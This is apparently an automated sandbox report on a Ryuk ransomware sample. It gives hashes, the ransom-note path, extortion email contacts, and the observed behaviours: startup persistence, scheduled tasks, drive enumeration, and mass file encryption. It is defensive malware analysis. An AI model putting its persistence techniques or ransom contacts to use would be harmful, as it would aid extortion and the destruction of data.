Analysis
-
max time kernel
137s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
20-10-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
Resource
win10v2004-20220901-en
General
-
Target
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
-
Size
885KB
-
MD5
a650d5676dc2c91a3af2216044ddaf8c
-
SHA1
851eea629fda6f930ebfd7ac45de5e8bc3f506b5
-
SHA256
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
-
SHA512
463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
SSDEEP
12288:q/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgooRn6X:qbC8tUlqgQKUKRjsKqgbN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
filereopening@msgden.com
filereopening@cyberfear.com
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
attrib.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exedescription ioc process File opened (read-only) \??\V: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\Z: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\F: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\M: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\R: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\O: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\U: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\I: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\K: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\A: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\J: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\N: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\B: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\P: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\S: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\E: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\G: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\H: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\W: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\X: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\Y: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\L: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\Q: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened (read-only) \??\T: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe -
Drops file in Program Files directory 64 IoCs
Processes:
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File created C:\Program Files\7-Zip\hrmlog1 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACECORE.DLL.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\EXPEDITN.INF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Google\RyukReadMe.html.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File created C:\Program Files\7-Zip\RyukReadMe.html 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\PREVIEW.GIF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\LAYERS.INF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html.[filereopening@msgden.com].RYK 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2044 schtasks.exe 588 schtasks.exe 1516 schtasks.exe 1732 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1944 taskkill.exe 1912 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exepid process 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 860 wrote to memory of 840 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 840 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 840 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 840 wrote to memory of 2044 840 cmd.exe schtasks.exe PID 840 wrote to memory of 2044 840 cmd.exe schtasks.exe PID 840 wrote to memory of 2044 840 cmd.exe schtasks.exe PID 860 wrote to memory of 1736 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1736 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1736 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 268 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 268 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 268 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 1528 wrote to memory of 588 1528 cmd.exe schtasks.exe PID 1528 wrote to memory of 588 1528 cmd.exe schtasks.exe PID 1528 wrote to memory of 588 1528 cmd.exe schtasks.exe PID 860 wrote to memory of 332 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 332 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 332 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 332 wrote to memory of 596 332 cmd.exe attrib.exe PID 332 wrote to memory of 596 332 cmd.exe attrib.exe PID 332 wrote to memory of 596 332 cmd.exe attrib.exe PID 860 wrote to memory of 612 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 612 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 612 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 612 wrote to memory of 1516 612 cmd.exe schtasks.exe PID 612 wrote to memory of 1516 612 cmd.exe schtasks.exe PID 612 wrote to memory of 1516 612 cmd.exe schtasks.exe PID 860 wrote to memory of 528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 528 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 528 wrote to memory of 1732 528 cmd.exe 